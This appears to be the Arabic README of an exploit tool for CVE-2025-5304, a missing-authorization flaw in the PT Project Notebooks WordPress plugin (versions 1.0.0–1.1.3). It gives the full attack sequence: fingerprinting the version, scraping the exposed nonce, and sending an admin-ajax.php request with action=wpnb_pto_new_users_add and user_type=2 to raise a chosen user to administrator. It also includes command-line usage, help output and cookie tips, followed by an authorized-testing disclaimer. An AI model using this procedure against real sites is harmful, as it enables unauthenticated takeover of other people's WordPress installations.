
PT Project Notebooks 1.0.0 - 1.1.3 - نقص التفويض يؤدي إلى تصعيد الامتيازات غير المصادق عليها
PT Project Notebooks 1.0.0 - 1.1.3 - غياب الترخيص يؤدي إلى تصعيد الامتيازات بدون مصادقة
مساعد إثبات المفهوم والاستغلال لإصدارات PT Project Notebooks 1.0.0–1.1.3: غياب الترخيص في
wpnb_pto_new_users_add()يسمح للمهاجمين غير المصادق عليهم بتصعيد صلاحيات مستخدم مختار إلى مسؤول عبرadmin-ajax.php.
إضافة PT Project Notebooks لووردبريس معرضة لثغرة تصعيد الامتيازات بسبب غياب الترخيص في الدالة wpnb_pto_new_users_add() في الإصدارات 1.0.0 إلى 1.1.3. هذا يُمكّن المهاجمين غير المصادق عليهم من رفع صلاحيات مستخدم معين إلى صلاحيات مسؤول.
wp-content/plugins/project-notebooks/readme.txt ويستخرج العلامة المستقرة (Stable tag) لتأكيد أن الهدف هو ≤ 1.1.3.custom.nonce و custom.ajax_url التي تحقنها الإضافة في الصفحة (عبر wp_localize_script).admin-ajax.php مع action=wpnb_pto_new_users_add و nonce المكتشف و ids=<UserID> و user_type=2 لنسخ كل صلاحيات المسؤول إلى المستخدم المستهدف.wordpress_logged_in_* المطابق حتى تنجح الدالة wp_verify_nonce().python3 CVE-2025-5304.py -u "http://TARGET/wordpress" -id 28
python3 CVE-2025-5304.py -u "http://TARGET/wordpress" -id 28 -c "wordpress_logged_in_...=..."
CVE-2025-5304.py -help
usage: t.py [-h] -u URL -id ID [-c COOKIE] [--skip-version]
CVE-2025-5304 (Nxploited Edition)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g. http://127.0.0.1/wordpress)
-id, --id ID User ID to escalate (e.g. 28)
-c, --cookie COOKIE Optional Cookie header value for session-bound nonces
--skip-version Skip readme.txt version check
-u / --url — رابط الموقع الأساسي؛ الأداة تقوم بتطبيعه وتقرأ readme الإضافة والصفحة الأمامية.-id / --id — معرف المستخدم الرقمي في ووردبريس لتصعيد صلاحياته (يكفي أن يكون مشتركًا).-c / --cookie — قيمة رأس Cookie كاملة (مثل wordpress_logged_in_*=...) مطلوبة إذا كان nonce مرتبطًا بالجلسة.--skip-version — تخطي التحقق من العلامة المستقرة في readme.txt (مفيد عندما يكون readme مخفيًا أو مخصصًا).ملاحظات حول nonce والكوكي
custom.nonce ظاهرًا في نافذة خاصة/تصفح متخفي، فهو عام—لا حاجة للكوكي.wordpress_logged_in_* مع الوسيط -c.custom.ajax_url تمامًا (البروتوكول/المضيف/المنفذ/المسار) كما تظهر في مصدر الصفحة.هذا المستودع وإثبات المفهوم والكود مقدمة لأغراض تعليمية واختبار الأمان المصرح به فقط. أنت وحدك المسؤول عن ضمان حصولك على إذن صريح لاختبار الأهداف. المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام أو الأضرار الناشئة عن استخدام هذا المشروع.
بواسطة: Khaled Alenazi (Nxploited)